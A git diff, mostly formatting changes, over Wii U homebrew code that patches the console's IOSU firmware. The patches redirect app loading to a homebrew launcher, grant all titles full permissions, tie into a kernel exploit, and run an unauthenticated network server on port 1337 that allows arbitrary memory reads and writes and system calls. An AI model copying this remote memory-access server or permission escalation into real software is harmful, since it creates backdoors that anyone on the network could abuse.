0x0C +#define IOS_RESUME 0x0D +#define IOS_SVCMSG 0x0E /* IPC message */ diff --git a/source/ios_mcp/source/logger.c b/source/ios_mcp/source/logger.c index 1574c40..3676009 100644 --- a/source/ios_mcp/source/logger.c +++ b/source/ios_mcp/source/logger.c @@ -1,27 +1,26 @@ -#include -#include -#include "types.h" +#include "logger.h" #include "imports.h" #include "socket.h" -#include "logger.h" +#include "types.h" +#include +#include #ifdef LOG_IP static int log_socket = 0; -int log_init(unsigned int ipAddress){ +int log_init(unsigned int ipAddress) { log_socket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); - if (log_socket < 0){ + if (log_socket < 0) { return log_socket; } struct sockaddr_in connect_addr; memset(&connect_addr, 0, sizeof(connect_addr)); - connect_addr.sin_family = AF_INET; - connect_addr.sin_port = 4405; + connect_addr.sin_family = AF_INET; + connect_addr.sin_port = 4405; connect_addr.sin_addr.s_addr = ipAddress; - if(connect(log_socket, (struct sockaddr*)&connect_addr, sizeof(connect_addr)) < 0) - { + if (connect(log_socket, (struct sockaddr *) &connect_addr, sizeof(connect_addr)) < 0) { closesocket(log_socket); log_socket = -1; } @@ -29,25 +28,22 @@ int log_init(unsigned int ipAddress){ return log_socket; } -void log_deinit() -{ - if(log_socket >= 0) - { +void log_deinit() { + if (log_socket >= 0) { closesocket(log_socket); log_socket = -1; } } -static void log_print(const char *str, int len) -{ - if(log_socket < 0) { +static void log_print(const char *str, int len) { + if (log_socket < 0) { return; } int ret; while (len > 0) { int block = len < 1400 ? len : 1400; // take max 1400 bytes per UDP packet - ret = send(log_socket, str, block, 0); - if(ret < 0) + ret = send(log_socket, str, block, 0); + if (ret < 0) break; len -= ret; @@ -55,9 +51,8 @@ static void log_print(const char *str, int len) } } -void log_printf(const char *format, ...) -{ - if(log_socket < 0) { +void log_printf(const char *format, ...) { + if (log_socket < 0) { return; } diff --git a/source/ios_mcp/source/logger.h b/source/ios_mcp/source/logger.h index 37e7c05..9286b55 100644 --- a/source/ios_mcp/source/logger.h +++ b/source/ios_mcp/source/logger.h @@ -15,8 +15,9 @@ void log_printf(const char *format, ...); #define log_printf(x, ...) #endif -#define DEBUG_FUNCTION_LINE(FMT, ARGS...)do { \ - log_printf("[%23s]%30s@L%04d: " FMT "",__FILE__,__FUNCTION__, __LINE__, ## ARGS); \ +#define DEBUG_FUNCTION_LINE(FMT, ARGS...) \ + do { \ + log_printf("[%23s]%30s@L%04d: " FMT "", __FILE__, __FUNCTION__, __LINE__, ##ARGS); \ } while (0) diff --git a/source/ios_mcp/source/main.c b/source/ios_mcp/source/main.c index 8a028a7..a4093c6 100644 --- a/source/ios_mcp/source/main.c +++ b/source/ios_mcp/source/main.c @@ -1,5 +1,5 @@ -#include "wupserver.h" #include "ipc.h" +#include "wupserver.h" static int threadsStarted = 0; diff --git a/source/ios_mcp/source/mcp_loadfile.c b/source/ios_mcp/source/mcp_loadfile.c index f3145c6..5affb1a 100644 --- a/source/ios_mcp/source/mcp_loadfile.c +++ b/source/ios_mcp/source/mcp_loadfile.c @@ -16,31 +16,31 @@ * - each request routes here where we can do whatever */ -#include "logger.h" -#include "ipc_types.h" #include "../../common/ipc_defs.h" #include "fsa.h" +#include "ipc_types.h" +#include "logger.h" #include "svc.h" #include -int (*const real_MCP_LoadFile)(ipcmessage *msg) = (void *) 0x0501CAA8 + 1; //+1 for thumb +int (*const real_MCP_LoadFile)(ipcmessage *msg) = (void *) 0x0501CAA8 + 1; //+1 for thumb int (*const MCP_DoLoadFile)(const char *path, const char *path2, void *outputBuffer, uint32_t outLength, uint32_t pos, int *bytesRead, uint32_t unk) = (void *) 0x05017248 + 1; static int MCP_LoadCustomFile(int target, char *path, int filesize, int fileoffset, void *out_buffer, int buffer_len, int pos); -static bool replace_valid = false; -static bool skipPPCSetup = false; -static bool doWantReplaceRPX = false; +static bool replace_valid = false; +static bool skipPPCSetup = false; +static bool doWantReplaceRPX = false; static bool replace_target_device = 0; -static uint32_t rep_filesize = 0; -static uint32_t rep_fileoffset = 0; +static uint32_t rep_filesize = 0; +static uint32_t rep_fileoffset = 0; static char rpxpath[256]; #define log(fmt, ...) log_printf("%s: " fmt, __FUNCTION__, __VA_ARGS__) -#define FAIL_ON(cond, val) \ - if (cond) { \ +#define FAIL_ON(cond, val) \ + if (cond) { \ log(#cond " (%08X)", val); \ - return -29; \ + return -29; \ } int _MCP_LoadFile_patch(ipcmessage *msg) { @@ -56,10 +56,10 @@ int _MCP_LoadFile_patch(ipcmessage *msg) { //DEBUG_FUNCTION_LINE("msg->ioctl.buffer_io = %p, msg->ioctl.length_io = 0x%X\n", msg->ioctl.buffer_io, msg->ioctl.length_io); //DEBUG_FUNCTION_LINE("request->type = %d, request->pos = %d, request->name = \"%s\"\n", request->type, request->pos, request->name); - int replace_target = replace_target_device; - int replace_filesize = rep_filesize; + int replace_target = replace_target_device; + int replace_filesize = rep_filesize; int replace_fileoffset = rep_fileoffset; - char *replace_path = rpxpath; + char *replace_path = rpxpath; if (strlen(request->name) > 1 && request->name[strlen(request->name) - 1] == 'x') { if (strncmp(request->name, "safe.rpx", strlen("safe.rpx")) != 0) { @@ -81,28 +81,28 @@ int _MCP_LoadFile_patch(ipcmessage *msg) { // The replacement may restart the application to execute a kernel exploit. // The men.rpx is hooked until the "IPC_CUSTOM_MEN_RPX_HOOK_COMPLETED" command is passed to IOCTL 0x100. // If the loading of the replacement file fails, the Wii U Menu is loaded normally. - replace_target = LOAD_FILE_TARGET_SD_CARD; - replace_filesize = 0; // unknown + replace_target = LOAD_FILE_TARGET_SD_CARD; + replace_filesize = 0; // unknown replace_fileoffset = 0; } else if (strncmp(request->name, "safe.rpx", strlen("safe.rpx")) == 0) { // if we don't explicitly replace files, we do want replace the Health and Safety app with the HBL if (request->pos == 0 && !doWantReplaceRPX) { - replace_path = "wiiu/apps/homebrew_launcher/homebrew_launcher.rpx"; + replace_path = "wiiu/apps/homebrew_launcher/homebrew_launcher.rpx"; replace_target = LOAD_FILE_TARGET_SD_CARD; //doWantReplaceXML = false; - doWantReplaceRPX = true; - replace_filesize = 0; // unknown + doWantReplaceRPX = true; + replace_filesize = 0; // unknown replace_fileoffset = 0; } } else if (!doWantReplaceRPX) { doWantReplaceRPX = false; // Only replace it once. - replace_path = NULL; + replace_path = NULL; return real_MCP_LoadFile(msg); } if (replace_path != NULL && strlen(replace_path) > 0) { doWantReplaceRPX = false; // Only replace it once. - int result = MCP_LoadCustomFile(replace_target, replace_path, replace_filesize, replace_fileoffset, msg->ioctl.buffer_io, msg->ioctl.length_io, request->pos); + int result = MCP_LoadCustomFile(replace_target, replace_path, replace_filesize, replace_fileoffset, msg->ioctl.buffer_io, msg->ioctl.length_io, request->pos); if (result >= 0) { return result; @@ -126,7 +126,7 @@ static int MCP_LoadCustomFile(int target, char *path, int filesize, int fileoffs if (target == LOAD_FILE_TARGET_SD_CARD) { char mountpath[] = "/vol/storage_iosu_homebrew"; - int fsa_h = svcOpen("/dev/fsa", 0); + int fsa_h = svcOpen("/dev/fsa", 0); FSA_Mount(fsa_h, "/dev/sdcard01", mountpath, 2, NULL, 0); svcClose(fsa_h); strncpy(filepath, mountpath, sizeof(filepath) - 1); @@ -143,7 +143,7 @@ static int MCP_LoadCustomFile(int target, char *path, int filesize, int fileoffs /* TODO: If this fails, try last argument as 1 */ int bytesRead = 0; - int result = MCP_DoLoadFile(filepath, NULL, buffer_out, buffer_len, pos + fileoffset, &bytesRead, 0); + int result = MCP_DoLoadFile(filepath, NULL, buffer_out, buffer_len, pos + fileoffset, &bytesRead, 0); //log("MCP_DoLoadFile returned %d, bytesRead = %d pos %d \n", result, bytesRead, pos + fileoffset); if (result >= 0) { @@ -161,7 +161,7 @@ static int MCP_LoadCustomFile(int target, char *path, int filesize, int fileoffs } int _MCP_ReadCOSXml_patch(uint32_t u1, uint32_t u2, MCPPPrepareTitleInfo *xmlData) { - int (*const real_MCP_ReadCOSXml_patch)(uint32_t u1, uint32_t u2, MCPPPrepareTitleInfo *xmlData) = (void *) 0x050024ec + 1; //+1 for thumb + int (*const real_MCP_ReadCOSXml_patch)(uint32_t u1, uint32_t u2, MCPPPrepareTitleInfo * xmlData) = (void *) 0x050024ec + 1; //+1 for thumb int res = real_MCP_ReadCOSXml_patch(u1, u2, xmlData); @@ -173,7 +173,7 @@ int _MCP_ReadCOSXml_patch(uint32_t u1, uint32_t u2, MCPPPrepareTitleInfo *xmlDat if (xmlData->titleId != 0x000500001010DC00 && // Mass Effect 3 Special Edition USA xmlData->titleId != 0x000500001010F500 && // Mass Effect 3 Special Edition EUR xmlData->titleId != 0x0005000010113000) { // Mass Effect 3 Special Edition JPN - + // Give all titles permission to use ACP xmlData->permissions[10].mask = 0xFFFFFFFFFFFFFFFF; } @@ -185,11 +185,11 @@ int _MCP_ReadCOSXml_patch(uint32_t u1, uint32_t u2, MCPPPrepareTitleInfo *xmlDat xmlData->titleId == 0x000500101004E200) { xmlData->codegen_size = 0x02000000; xmlData->codegen_core = 0x80000001; - xmlData->max_size = 0x40000000; + xmlData->max_size = 0x40000000; // Set maximum codesize to 64 MiB - xmlData->max_codesize = 0x04000000; - xmlData->avail_size = 0; + xmlData->max_codesize = 0x04000000; + xmlData->avail_size = 0; xmlData->overlay_arena = 0; // Give us full permissions everywhere @@ -197,9 +197,9 @@ int _MCP_ReadCOSXml_patch(uint32_t u1, uint32_t u2, MCPPPrepareTitleInfo *xmlDat xmlData->permissions[i].mask = 0xFFFFFFFFFFFFFFFF; } - xmlData->default_stack0_size = 0; - xmlData->default_stack1_size = 0; - xmlData->default_stack2_size = 0; + xmlData->default_stack0_size = 0; + xmlData->default_stack1_size = 0; + xmlData->default_stack2_size = 0; xmlData->default_redzone0_size = 0; xmlData->default_redzone1_size = 0; xmlData->default_redzone2_size = 0; @@ -260,16 +260,16 @@ int _MCP_ioctl100_patch(ipcmessage *msg) { DEBUG_FUNCTION_LINE("IPC_CUSTOM_LOAD_CUSTOM_RPX\n"); if (msg->ioctl.length_in >= 0x110) { - int target = msg->ioctl.buffer_in[0x04 / 0x04]; - int filesize = msg->ioctl.buffer_in[0x08 / 0x04]; + int target = msg->ioctl.buffer_in[0x04 / 0x04]; + int filesize = msg->ioctl.buffer_in[0x08 / 0x04]; int fileoffset = msg->ioctl.buffer_in[0x0C / 0x04]; - char *str_ptr = (char *) &msg->ioctl.buffer_in[0x10 / 0x04]; + char *str_ptr = (char *) &msg->ioctl.buffer_in[0x10 / 0x04]; memset(rpxpath, 0, sizeof(rpxpath)); strncpy(rpxpath, str_ptr, 256 - 1); - rep_filesize = filesize; - rep_fileoffset = fileoffset; + rep_filesize = filesize; + rep_fileoffset = fileoffset; doWantReplaceRPX = true; //doWantReplaceXML = true; replace_valid = true; @@ -309,8 +309,8 @@ int _MCP_ioctl100_patch(ipcmessage *msg) { // Kill existing syslogs to avoid long catch up uint32_t *bufferPtr = (uint32_t *) (*(uint32_t *) 0x05095ecc); - bufferPtr[0] = 0; - bufferPtr[1] = 0; + bufferPtr[0] = 0; + bufferPtr[1] = 0; break; } diff --git a/source/ios_mcp/source/net_ifmgr_ncl.c b/source/ios_mcp/source/net_ifmgr_ncl.c index 95074ea..8571add 100644 --- a/source/ios_mcp/source/net_ifmgr_ncl.c +++ b/source/ios_mcp/source/net_ifmgr_ncl.c @@ -1,8 +1,8 @@ -#include -#include #include "net_ifmgr_ncl.h" #include "imports.h" #include "svc.h" +#include +#include static int ifmgrncl_handle = 0; @@ -40,9 +40,9 @@ static void freeIobuf(void *ptr) { } int IFMGRNCL_GetInterfaceStatus(u16 interface_id, u16 *out_status) { - u8 *iobuf1 = allocIobuf(0x2); - u16 *inbuf = (u16 *) iobuf1; - u8 *iobuf2 = allocIobuf(0x8); + u8 *iobuf1 = allocIobuf(0x2); + u16 *inbuf = (u16 *) iobuf1; + u8 *iobuf2 = allocIobuf(0x8); u16 *outbuf = (u16 *) iobuf2; inbuf[0] = interface_id; diff --git a/source/ios_mcp/source/socket.c b/source/ios_mcp/source/socket.c index 8dae5f8..15ed892 100644 --- a/source/ios_mcp/source/socket.c +++ b/source/ios_mcp/source/socket.c @@ -1,9 +1,9 @@ -#include -#include -#include #include "socket.h" -#include "svc.h" #include "imports.h" +#include "svc.h" +#include +#include +#include static int socket_handle = 0; @@ -41,7 +41,7 @@ static void freeIobuf(void *ptr) { } int socket(int domain, int type, int protocol) { - u8 *iobuf = allocIobuf(0xC); + u8 *iobuf = allocIobuf(0xC); u32 *inbuf = (u32 *) iobuf; inbuf[0] = domain; @@ -55,7 +55,7 @@ int socket(int domain, int type, int protocol) { } int closesocket(int sockfd) { - u8 *iobuf = allocIobuf(0x4); + u8 *iobuf = allocIobuf(0x4); u32 *inbuf = (u32 *) iobuf; inbuf[0] = sockfd; @@ -67,8 +67,8 @@ int closesocket(int sockfd) { } int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen) { - u8 *iobuf = allocIobuf(0x18); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(0x18); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) inbuf; inbuf[0] = sockfd; @@ -97,7 +97,7 @@ int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen) { int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen) { if (addrlen != 0x10) return -1; - u8 *iobuf = allocIobuf(0x18); + u8 *iobuf = allocIobuf(0x18); u32 *inbuf = (u32 *) iobuf; inbuf[0] = sockfd; @@ -113,7 +113,7 @@ int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen) { int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen) { if (addrlen != 0x10) return -1; - u8 *iobuf = allocIobuf(0x18); + u8 *iobuf = allocIobuf(0x18); u32 *inbuf = (u32 *) iobuf; inbuf[0] = sockfd; @@ -127,7 +127,7 @@ int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen) { } int listen(int sockfd, int backlog) { - u8 *iobuf = allocIobuf(0x8); + u8 *iobuf = allocIobuf(0x8); u32 *inbuf = (u32 *) iobuf; inbuf[0] = sockfd; @@ -140,7 +140,7 @@ int listen(int sockfd, int backlog) { } int shutdown(int sockfd, int how) { - u8 *iobuf = allocIobuf(0x8); + u8 *iobuf = allocIobuf(0x8); u32 *inbuf = (u32 *) iobuf; inbuf[0] = sockfd; @@ -159,9 +159,9 @@ int recv(int sockfd, void *buf, size_t len, int flags) { void *data_buf = svcAllocAlign(0xCAFF, len, 0x40); if (!data_buf) return -100; - u8 *iobuf = allocIobuf(0x38); + u8 *iobuf = allocIobuf(0x38); iovec_s *iovec = (iovec_s *) iobuf; - u32 *inbuf = (u32 *) &iobuf[0x30]; + u32 *inbuf = (u32 *) &iobuf[0x30]; inbuf[0] = sockfd; inbuf[1] = flags; @@ -189,9 +189,9 @@ int send(int sockfd, const void *buf, size_t len, int flags) { void *data_buf = svcAllocAlign(0xCAFF, len, 0x40); if (!data_buf) return -100; - u8 *iobuf = allocIobuf(0x38); + u8 *iobuf = allocIobuf(0x38); iovec_s *iovec = (iovec_s *) iobuf; - u32 *inbuf = (u32 *) &iobuf[0x30]; + u32 *inbuf = (u32 *) &iobuf[0x30]; memcpy(data_buf, buf, len); diff --git a/source/ios_mcp/source/socket.h b/source/ios_mcp/source/socket.h index f02e5bb..0178988 100644 --- a/source/ios_mcp/source/socket.h +++ b/source/ios_mcp/source/socket.h @@ -5,70 +5,70 @@ #include #include -#define SOL_SOCKET 0xFFFF +#define SOL_SOCKET 0xFFFF -#define PF_UNSPEC 0 -#define PF_INET 2 -#define PF_INET6 10 +#define PF_UNSPEC 0 +#define PF_INET 2 +#define PF_INET6 10 -#define AF_UNSPEC PF_UNSPEC -#define AF_INET PF_INET -#define AF_INET6 PF_INET6 +#define AF_UNSPEC PF_UNSPEC +#define AF_INET PF_INET +#define AF_INET6 PF_INET6 -#define SOCK_STREAM 1 -#define SOCK_DGRAM 2 +#define SOCK_STREAM 1 +#define SOCK_DGRAM 2 -#define MSG_CTRUNC 0x01000000 -#define MSG_DONTROUTE 0x02000000 -#define MSG_EOR 0x04000000 -#define MSG_OOB 0x08000000 -#define MSG_PEEK 0x10000000 -#define MSG_TRUNC 0x20000000 -#define MSG_WAITALL 0x40000000 +#define MSG_CTRUNC 0x01000000 +#define MSG_DONTROUTE 0x02000000 +#define MSG_EOR 0x04000000 +#define MSG_OOB 0x08000000 +#define MSG_PEEK 0x10000000 +#define MSG_TRUNC 0x20000000 +#define MSG_WAITALL 0x40000000 -#define SHUT_RD 0 -#define SHUT_WR 1 -#define SHUT_RDWR 2 +#define SHUT_RD 0 +#define SHUT_WR 1 +#define SHUT_RDWR 2 -#define SO_DEBUG 0x0001 -#define SO_ACCEPTCONN 0x0002 -#define SO_REUSEADDR 0x0004 -#define SO_KEEPALIVE 0x0008 -#define SO_DONTROUTE 0x0010 -#define SO_BROADCAST 0x0020 -#define SO_USELOOPBACK 0x0040 -#define SO_LINGER 0x0080 -#define SO_OOBINLINE 0x0100 -#define SO_REUSEPORT 0x0200 -#define SO_SNDBUF 0x1001 -#define SO_RCVBUF 0x1002 -#define SO_SNDLOWAT 0x1003 -#define SO_RCVLOWAT 0x1004 -#define SO_SNDTIMEO 0x1005 -#define SO_RCVTIMEO 0x1006 -#define SO_ERROR 0x1007 -#define SO_TYPE 0x1008 +#define SO_DEBUG 0x0001 +#define SO_ACCEPTCONN 0x0002 +#define SO_REUSEADDR 0x0004 +#define SO_KEEPALIVE 0x0008 +#define SO_DONTROUTE 0x0010 +#define SO_BROADCAST 0x0020 +#define SO_USELOOPBACK 0x0040 +#define SO_LINGER 0x0080 +#define SO_OOBINLINE 0x0100 +#define SO_REUSEPORT 0x0200 +#define SO_SNDBUF 0x1001 +#define SO_RCVBUF 0x1002 +#define SO_SNDLOWAT 0x1003 +#define SO_RCVLOWAT 0x1004 +#define SO_SNDTIMEO 0x1005 +#define SO_RCVTIMEO 0x1006 +#define SO_ERROR 0x1007 +#define SO_TYPE 0x1008 -#define INADDR_ANY 0x00000000 -#define INADDR_BROADCAST 0xFFFFFFFF +#define INADDR_ANY 0x00000000 +#define INADDR_BROADCAST 0xFFFFFFFF #define INADDR_NONE 0xFFFFFFFF -#define INET_ADDRSTRLEN 16 +#define INET_ADDRSTRLEN 16 -#define INADDR_LOOPBACK 0x7f000001 -#define INADDR_ANY 0x00000000 -#define INADDR_BROADCAST 0xFFFFFFFF -#define INADDR_NONE 0xFFFFFFFF +#define INADDR_LOOPBACK 0x7f000001 +#define INADDR_ANY 0x00000000 +#define INADDR_BROADCAST 0xFFFFFFFF +#define INADDR_NONE 0xFFFFFFFF -#define INET_ADDRSTRLEN 16 +#define INET_ADDRSTRLEN 16 -#define IPPROTO_IP 0 /* dummy for IP */ -#define IPPROTO_UDP 17 /* user datagram protocol */ -#define IPPROTO_TCP 6 /* tcp */ +#define IPPROTO_IP 0 /* dummy for IP */ +#define IPPROTO_UDP 17 /* user datagram protocol */ +#define IPPROTO_TCP 6 /* tcp */ -#define IP_TOS 7 -#define IP_TTL 8 -#define IP_MULTICAST_LOOP 9 +#define IP_TOS 7 +#define IP_TTL 8 +#define IP_MULTICAST_LOOP 9 #define IP_MULTICAST_TTL 10 #define IP_ADD_MEMBERSHIP 11 #define IP_DROP_MEMBERSHIP 12 diff --git a/source/ios_mcp/source/types.h b/source/ios_mcp/source/types.h index 7b77e8a..4424d9d 100644 --- a/source/ios_mcp/source/types.h +++ b/source/ios_mcp/source/types.h @@ -1,10 +1,10 @@ #ifndef TYPES_H #define TYPES_H -#include #include +#include -#define U64_MAX UINT64_MAX +#define U64_MAX UINT64_MAX typedef uint8_t u8; typedef uint16_t u16; diff --git a/source/ios_mcp/source/wupserver.c b/source/ios_mcp/source/wupserver.c index bbb6762..2d27ae5 100644 --- a/source/ios_mcp/source/wupserver.c +++ b/source/ios_mcp/source/wupserver.c @@ -1,13 +1,13 @@ -#include -#include -#include +#include "fsa.h" #include "imports.h" +#include "ipc.h" +#include "logger.h" #include "net_ifmgr_ncl.h" #include "socket.h" -#include "fsa.h" #include "svc.h" -#include "logger.h" -#include "ipc.h" +#include +#include +#include static int serverKilled; static int serverSocket; @@ -24,84 +24,84 @@ static int serverCommandHandler(u32 *command_buffer, u32 length) { case 0: // write // [cmd_id][addr] - { - void *dst = (void *) command_buffer[1]; + { + void *dst = (void *) command_buffer[1]; - memcpy(dst, &command_buffer[2], length - 8); - } + memcpy(dst, &command_buffer[2], length - 8); + } break; case 1: // read // [cmd_id][addr][length] - { - void *src = (void *) command_buffer[1]; - length = command_buffer[2]; + { + void *src = (void *) command_buffer[1]; + length = command_buffer[2]; - memcpy(&command_buffer[1], src, length); - out_length = length + 4; - } + memcpy(&command_buffer[1], src, length); + out_length = length + 4; + } break; case 2: // svc // [cmd_id][svc_id] - { - int svc_id = command_buffer[1]; - int size_arguments = length - 8; + { + int svc_id = command_buffer[1]; + int size_arguments = length - 8; - u32 arguments[8]; - memset(arguments, 0x00, sizeof(arguments)); - memcpy(arguments, &command_buffer[2], (size_arguments < 8 * 4) ? size_arguments : (8 * 4)); + u32 arguments[8]; + memset(arguments, 0x00, sizeof(arguments)); + memcpy(arguments, &command_buffer[2], (size_arguments < 8 * 4) ? size_arguments : (8 * 4)); - // return error code as data - out_length = 8; - command_buffer[1] = ((int (*const)(u32, u32, u32, u32, u32, u32, u32, u32)) (MCP_SVC_BASE + svc_id * 8))(arguments[0], arguments[1], arguments[2], arguments[3], arguments[4], arguments[5], - arguments[6], arguments[7]); - } + // return error code as data + out_length = 8; + command_buffer[1] = ((int (*const)(u32, u32, u32, u32, u32, u32, u32, u32))(MCP_SVC_BASE + svc_id * 8))(arguments[0], arguments[1], arguments[2], arguments[3], arguments[4], arguments[5], + arguments[6], arguments[7]); + } break; case 3: // kill // [cmd_id] - { - serverKilled = 1; - ipc_deinit(); - } + { + serverKilled = 1; + ipc_deinit(); + } break; case 4: // memcpy // [dst][src][size] - { - void *dst = (void *) command_buffer[1]; - void *src = (void *) command_buffer[2]; - int size = command_buffer[3]; + { + void *dst = (void *) command_buffer[1]; + void *src = (void *) command_buffer[2]; + int size = command_buffer[3]; - memcpy(dst, src, size); - } + memcpy(dst, src, size); + } break; case 5: // repeated-write // [address][value][n] - { - u32 *dst = (u32 *) command_buffer[1]; - u32 *cache_range = (u32 *) (command_buffer[1] & ~0xFF); - u32 value = command_buffer[2]; - u32 n = command_buffer[3]; + { + u32 *dst = (u32 *) command_buffer[1]; + u32 *cache_range = (u32 *) (command_buffer[1] & ~0xFF); + u32 value = command_buffer[2]; + u32 n = command_buffer[3]; - u32 old = *dst; - int i; - for (i = 0; i < n; i++) { - if (*dst != old) { - if (*dst == 0x0) old = *dst; - else { - *dst = value; - svcFlushDCache(cache_range, 0x100); - break; + u32 old = *dst; + int i; + for (i = 0; i < n; i++) { + if (*dst != old) { + if (*dst == 0x0) old = *dst; + else { + *dst = value; + svcFlushDCache(cache_range, 0x100); + break; + } + } else { + svcInvalidateDCache(cache_range, 0x100); + usleep(50); } - } else { - svcInvalidateDCache(cache_range, 0x100); - usleep(50); } } - } break; default: // unknown command @@ -141,8 +141,8 @@ static void serverListenClients() { memset(&server, 0x00, sizeof(server)); - server.sin_family = AF_INET; - server.sin_port = 1337; + server.sin_family = AF_INET; + server.sin_port = 1337; server.sin_addr.s_addr = 0; if (bind(serverSocket, (struct sockaddr *) &server, sizeof(server)) < 0) { diff --git a/source/ios_usb/source/main.c b/source/ios_usb/source/main.c index 9619110..0229ea6 100644 --- a/source/ios_usb/source/main.c +++ b/source/ios_usb/source/main.c @@ -5,7 +5,7 @@ void _main() { int (*reply)(int, int) = (int (*)(int, int)) 0x1012ED04; int saved_handle = *(volatile int *) 0x0012F000; - int myret = reply(saved_handle, 0); + int myret = reply(saved_handle, 0); if (myret != 0) ios_shutdown(1); @@ -19,6 +19,4 @@ void _main() { "newlr: .word 0x1012EACC\n" "newr0: .word 0x10146080\n" "newpc: .word 0x10111164\n"); - - } diff --git a/source/main.cpp b/source/main.cpp index 6b3680b..ed6ffa6 100644 --- a/source/main.cpp +++ b/source/main.cpp @@ -1,7 +1,7 @@ -#include -#include #include #include +#include +#include #include #include @@ -30,11 +30,11 @@ int main(int argc, char **argv) { // When the kernel exploit is set up successfully, we signal the ios to move on. int mcpFd = IOS_Open("/dev/mcp", (IOSOpenMode) 0); if (mcpFd >= 0) { - int in = IPC_CUSTOM_MEN_RPX_HOOK_COMPLETED; + int in = IPC_CUSTOM_MEN_RPX_HOOK_COMPLETED; int out = 0; IOS_Ioctl(mcpFd, 100, &in, sizeof(in), &out, sizeof(out)); - in = IPC_CUSTOM_START_MCP_THREAD; + in = IPC_CUSTOM_START_MCP_THREAD; out = 0; IOS_Ioctl(mcpFd, 100, &in, sizeof(in), &out, sizeof(out)); IOS_Close(mcpFd);